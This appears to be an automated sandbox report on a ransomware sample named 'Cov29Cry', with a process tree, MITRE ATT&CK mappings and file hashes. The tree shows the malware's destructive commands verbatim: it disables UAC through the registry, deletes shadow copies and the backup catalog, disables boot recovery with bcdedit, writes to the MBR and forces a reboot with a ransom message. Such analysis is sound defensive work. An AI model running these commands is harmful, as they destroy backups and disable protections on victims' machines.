C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:124
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4988
-
-
C:\Users\Admin\AppData\Local\Temp\A28B.tmp\mbr.exembr.exe3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
PID:1448
-
-
C:\Users\Admin\AppData\Local\Temp\A28B.tmp\Cov29Cry.exeCov29Cry.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2300 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
PID:972 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete5⤵PID:2576
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:2644
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete6⤵PID:796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no5⤵PID:4108
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures6⤵
- Modifies boot configuration data using bcdedit
PID:4044
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no6⤵
- Modifies boot configuration data using bcdedit
PID:4500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet5⤵PID:1160
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet6⤵
- Deletes backup catalog
PID:1320
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt5⤵PID:320
-
-
-
-
C:\Windows\SysWOW64\shutdown.exeshutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"3⤵
- System Location Discovery: System Language Discovery
PID:1460
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 93⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3488
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im explorer.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2684
-
-
C:\Users\Admin\AppData\Local\Temp\A28B.tmp\Cov29LockScreen.exeCov29LockScreen.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1360
-
-
-
C:\Windows\System32\PickerHost.exeC:\Windows\System32\PickerHost.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:1176
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2564
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:1436
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:308
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:2764
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Direct Volume Access
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
3File Deletion
3Modify Registry
3Pre-OS Boot
1Bootkit
1Discovery
Browser Information Discovery
1Peripheral Device Discovery
1Query Registry
3Remote System Discovery
1System Information Discovery
3System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
MD5b5ad5caaaee00cb8cf445427975ae66c
SHA1dcde6527290a326e048f9c3a85280d3fa71e1e22
SHA256b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8
SHA51292f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
1008B
MD5d222b77a61527f2c177b0869e7babc24
SHA13f23acb984307a4aeba41ebbb70439c97ad1f268
SHA25680dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747
SHA512d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff
-
Filesize
649B
MD5a4cd4da8695d8b8f8aa89e1858afda89
SHA1908b41b9d150b9de8dd1cb96e3f08dfa9c4a7e11
SHA256102776f02eb3c1451509e7a128fe86807a93de4e629f0d4bcdaf1891e51f249f
SHA51238022a715f156df47ce5f19a4f05e5033a93819099cb83312615a0931b46054157864b395fa3ceafab0ea21ea23e3689b827ba1768eabfc826f36eabe8558103
-
Filesize
2KB
MD5d56088dbb891a10ba1598822da42e376
SHA11937a6dd7c0b26a4fbba8e3b1d8b389cdafbdc2d
SHA2568049959c602e36df027aeb8ecb5fc429921b8d276408b0f2623c5a0d62556ac9
SHA5126e46aa8906fcad639841ce21111977b67b50cb0e8643a1b5263c602b2d2fe51be5f4dc5ec081f2a47e4525d96da1af09aa5aaaa755debce9cb955be1c5a2e47d
-
Filesize
1KB
MD5565c6712aaa14ccc6ad4410e740c5ecc
SHA1628783382d154365dc145d064dd3d76c05115b8e
SHA2564050bc3eff96e9e9b653ada610ac27a8477d8167377028635b8671f96de5a5be
SHA512e686679fda71cf64294c246396e98c9e680ea6aa339069ca0bbf43c3b07c18660705949f4168d7a51a396f6219c09873ab7e434eb0c532ab248a1e884ba17961
-
Filesize
1KB
MD55f9fb304556322f748fcc13f3cd167a1
SHA1f3b2120712b619f88631655cab95804e8f758ae9
SHA2565509637103d6e054af9050dbc5276a93a987f4611a6c407c7203e5a973474270
SHA512b838c18115e1cf07163153e16487d45a3c989625bdbdc9a9bc888473fb3e8261b313161b76a332486c464ccf25c566e952e54e5700b6fb5edb5df1ec3ac30332
-
Filesize
1KB
MD577cdfd236e8d67ba26c983408872cfcc
SHA19bcc36ba498823d40ba9a2e8bc9d3d4f573f5985
SHA256069796b6f0ff0a7ab27d220afe1339a68554e696e270ac99e3c10fda750a63be
SHA512868ce7645db63951a5222e37a87c945a5b7b6280f42f6d35a3f9cd7b1b93145041f46c73ab9d8aa32c500a6672c2f1665b2a93a8fb4a8c77c6a6302947d03350
-
Filesize
1KB
MD5d635a0c6082a50f1f04f87998fc644d4
SHA1fcd41998432e24cb64b76ed7f0a6ab9f85f5c73e
SHA25647313188845eff9a2ea67f6b51ee072640b05d1378b5382bce9b129ec7da7d47
SHA512615124d0169efe9ba76c2764c28701f9fa1e79fee26ed780248585d2b3b1242b86a269cae0c90206c38cef8398e83dcda29ec8d76655431879880f48aa7d9a1f
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
1KB
MD52334f48b6c0a537b9a522fafc75f993d
SHA1c5c0b896d0572f73977ef8c20e6b7115dc2bde4b
SHA256e1a40ccaa28ae559b1fca62b79bbcea053b088d047050312ecef6a38ec71e281
SHA51278058ffcb77d021376b2abacb86c0f406afcd600d4b9a7407c90a703cbda10bbe7ae9ab29e587a0970997667d57d615a4a76b323f0e7a354d3fb547aab6d9849
-
Filesize
1KB
MD5632f03311458c38ee806078260d21018
SHA1d01cf4c185818cb7354953be28fbc9c78c58a722
SHA2565896910dca0c32dc02a88054e3e87a416ff6586df64eafd0f7adf15c31f7619b
SHA512c7ca857892ec7fe3af9b411654047c7e624e32274723068c374b78894f535cccef85f153bba09ac05c5a5baa537d260994d1d336c07920f4b9451e552e56c4f2
-
Filesize
1KB
MD5b05d80579822d092594dcf077ad41817
SHA1dc039f11ee2a60d9cafec3d70b3f9287dd0b89f6
SHA256324fed2675a6602d866b608e185d4be666b22d081a4be0b6851d019256038063
SHA51278a134ab247307cb8826ec7c4a6854dcbc679f108a7cc1dc51d744cc0efabe2949d57a7b1fa825b0ab9220ca283406ddb04ca06bd9b932fcfabf887a07dbc73f
-
Filesize
10KB
MD5956e9d4c4a93af1277cac79090c28b2a
SHA1cc5cecee6ce7754512f4deb8eff7d00bb5ff87f6
SHA256065edd013ba7bf61730bd89c05f261873ffe91782032f4e3499058a21322a3e6
SHA512d5745290a8773d548d26e8060e67f13acb7beba6e680ac8bf1d121f7bf2cff997dc0e8af3ddedaf8f55598f2aad1058764ecea00961586f16c2af182f9b1a091
-
Filesize
9KB
MD5cde79ac375ec203a290cd78304cdefc0
SHA1ccb131a2fd93f3a9f716fc07c7dea3b317e56f42
SHA256b306368d23a4d18df5d5bf834b61edbc097676c2d9829246f6bda9481107b5bc
SHA51281528388b7dc82864a4d7fbcb12bec9185a12328d7822e9799a253f6dfdf3fd324cbb5318df5b715d1eeb21922889370792172b7fec526732b8f9ad9829a036d
-
Filesize
10KB
MD5eeaeb9b04f56a2a13b1c1598bf476418
SHA107074997d945edce6352b2252cf0234027882106
SHA2567e1cddb6d3c1adbf3d260333fa7a2939e530ae25afe318182797bc3cdc630b9a
SHA512a6aae40a3815fc7ab017ec5b7ccac2500dd9d5853e078e0cf27530f50e94672697b49291adbd1a19b821c4376ee4d8cd750154e7a48c2381485d60933e5a9991
-
Filesize
10KB
MD547d5ef9b63318393aa3b986bd1f0de5c
SHA1aae11b89cf72ad87f5731f45519b3f48efec24fe
SHA256271961bea9c4c548787aa9c5dbc7b985ec11564db080b69ee01f8e763741fa57
SHA512ce0ee5a8d0229701a67f057c0b1dd0f814378cbacfd1fb629eada99c35c32d8b10e39f340c2e7b39d5049628a2afba5ef693041c480d966c9898f4f0b16926ed
-
Filesize
9KB
MD5bc7274f7a6a9e1490918ffbca1aacb82
SHA10f8be0e7477bca3fd3da1402f3527718ea92cd12
SHA2566cf6294bff06f70080504f81421ee4490bd387c2885686048340f78a2c4a9bd3
SHA5121be7357bceb75e25fedeb549c9be711a2f3cf263bc26f6f59d7209127a4ba10eb5f22d5cd5691745ca4cbeb715dcb0c5020c817f559f8eb60ecf243486ee586f
-
Filesize
10KB
MD5effa46e70734dffe54d33e36f20dc0b6
SHA17a4bda5ef1fb4a723b755e578974e5ac29bdf101
SHA2564622e12c88175f8addfabb5f42ca6a4cdb455df246c66ea2bc5c340bca46598c
SHA5121369e653ed67d26788646a22c80f1e1e1ce3e20336409abe49bfd75ff7de1134b51134acb5cf9492c9fcc37af61a83b621c435f0844ad0964f6c22da95b59a8b
-
Filesize
10KB
MD5ac65049bd9355f987d54d12e61295fe1
SHA11041b4f49916cbc60f053895fef62c342294781f
SHA256bbd14f52e6529575e6efcb4bdf749553c688576614276be38a97afd6f29e4a46
SHA5129c40b1a46333e7a3c838dbbae85f02ab8b7237d141a75fe0e4031eed84cc3e0294f47d141617f865a65f8747a221f35fad71e680c57b1a262cbfcc72f8440b43
-
Filesize
10KB
MD568517822dbbef06db71ef56ef93fe1b9
SHA1824da75193dd79fe9dbc03699575bf59e8ae6757
SHA2560160921e3137dc33038fd787a78ac6d603d15306a4aff7f733b25e9875ea8051
SHA51278897ea15ff44af93883df4fb03a5394327caeb41c86821b3b16c5a1e312e0fbc26defced9c44107bc3fa249759c759fb68eff2937707283e104c3d0ec943c1a
-
Filesize
10KB
MD5a782bb16e840dc35e5fbfa543f90361b
SHA10118451cea381c815c44f8b10a6345527c54160f
SHA2566b2296869e545e0c16794b5651ba940a79eae2d43e9e8e3842ea30f1d2843c30
SHA512012bbddace42175e15d6287f8b606088629a48c9a30dd89a4728894b14423ca3d8efee74f98aeace6b71dc4a3efba92b6892097d2961be5f45501eadc22cd939
-
Filesize
10KB
MD53c7e9f92a695310189cc69c270c94578
SHA14f95a42ff290c9991daa4ed73f34838cc05e9249
SHA2561e913a32038b2741b47936adfc42a8f53e367897c6ad57b777f1b9bee940f3d5
SHA51231d53a5196489d2606309371b1ac73d51a375a4abef2a59847cf10cc4b0cd80941b7356d748e22a0bc8b5178d47756ff35a7e9206d551fbe45ff05fe85b7e4e5
-
Filesize
10KB
MD5f6c677ac6587fcf48616438bebcbb949
SHA18111e7b541acc952b1e4694c0ad141ba692af51e
SHA2562b360aca1eb17b6eb0ab3461b8268da2cf498636bbae132a817920cab7409a9f
SHA512911894dbdff41b49ad124771e8d1148ceefae655c611596dbc766d329c40173beadd019ecf6b0e084b64bf686d88b28fe1a953e4b6c1ade9197241dbe2168291
-
Filesize
10KB
MD54476456dd99fc4f58aaea44cdf000b53
SHA15335d72dfbfe53465d247e005c607e4f8ce79862
SHA256ce07754d62b675b5a107a6192513cb6a249b3d6a193f009d189b958474f99c36
SHA512c237d494ea3b29da157b37a2fea0e24929dd33a636846a8050757728907e5d1a01d9e7b779ed780f90a061552a6b9af3ce416e685362e91c9e7ae05c1adae586
-
Filesize
10KB
MD5864512a51626b84258059f0d559f1e6e
SHA1ca68889f2ef60a1d1ae74ccdb18bb59d858800c9
SHA256a7aec3e99cfead3fdeaad040eef02995ba18852065f56e115f128a7defa5e508
SHA5120ea8bcd7d20e1a55ef20c45ffae2cdf62bbb1d3382e300b4dee065f50734338d4b4bac0a0917d829f5a08947b428c6f46960ab63e8b991cd80320f6d5e7270bf
-
Filesize
99KB
MD59be442654766b332cccae196ddfae2d0
SHA195a88efea45a8c13843da96d8a9421a7ad884086
SHA256414ae8b8fb56ab05ba7251b515fc56f2ed9c219f38c2968812c4d7076442afaf
SHA512054be76bb04ea881b6d1b2c46488dd3fbf095ba85173cce33d1d2df0d522bb19c4d71c542043cdf4f2ed9c8fd4b92620816bd55a1beaec7944bbc52eaa82b036
-
Filesize
99KB
MD537caea604b383564c1aa99b6bff420ee
SHA1f78d84ae94ba5b6479ea8a68becfb72b4be97db1
SHA2565b4fb33aa7de3bbde8b8213ddd7b0921d2d3971392a4524a7263e5dee352afec
SHA51236a7a6540a017ad3e52e5d011eb8aaa862de87bba735761fc05be0952d4e6a2444c72c936a2cb02414427fc9e4f8cb0ee21c7473372399e04295f1459f3b0668
-
Filesize
99KB
MD57e2a1a61e36f76591f80bcbcbafd4797
SHA12312ad8e51d4629ea8f936e5385f7775d6abd264
SHA25663526e2524cbaf50b348feb85d108810157ecf3f15415ef9a853ddaff2badf4f
SHA51225cf383416c36d664fa0a378d04230ca5421d62e1fc4ceddcb80f081e738460b405f45eb2e9752ae7f6fc5bfeb96a39aed1c7a7c9a954b8872af9246a714b558
-
Filesize
103KB
MD58bcd083e16af6c15e14520d5a0bd7e6a
SHA1c4d2f35d1fdb295db887f31bbc9237ac9263d782
SHA256b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a
SHA51235999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a
-
Filesize
48KB
MD5f724c6da46dc54e6737db821f9b62d77
SHA1e35d5587326c61f4d7abd75f2f0fc1251b961977
SHA2566cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c
SHA5126f83dd7821828771a9cae34881c611522f6b5a567f5832f9e4b9b4b59bf495f40ad78678bd86cba59d32ea8644b4aa5f052552774fea142b9d6da625b55b6afc
-
Filesize
1KB
MD557f0432c8e31d4ff4da7962db27ef4e8
SHA1d5023b3123c0b7fae683588ac0480cd2731a0c5e
SHA256b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc
SHA512bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf
-
Filesize
144B
MD5c0437fe3a53e181c5e904f2d13431718
SHA144f9547e7259a7fb4fe718e42e499371aa188ab6
SHA256f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22
SHA512a6b488fc74dc69fc4227f92a06deb297d19cd54b0e07659f9c9a76ce15d1ef1d8fa4d607acdd03d30d3e2be2a0f59503e27fc95f03f3006e137fa2f92825e7e3
-
Filesize
1.3MB
MD535af6068d91ba1cc6ce21b461f242f94
SHA1cb054789ff03aa1617a6f5741ad53e4598184ffa
SHA2569ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e
SHA512136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169
-
Filesize
861B
MD5c53dee51c26d1d759667c25918d3ed10
SHA1da194c2de15b232811ba9d43a46194d9729507f0
SHA256dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52
SHA512da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c
-
Filesize
1.7MB
MD5272d3e458250acd2ea839eb24b427ce5
SHA1fae7194da5c969f2d8220ed9250aa1de7bf56609
SHA256bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3
SHA512d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c
-
Filesize
55B
MD50f98a5550abe0fb880568b1480c96a1c
SHA1d2ce9f7057b201d31f79f3aee2225d89f36be07d
SHA2562dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1
SHA512dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6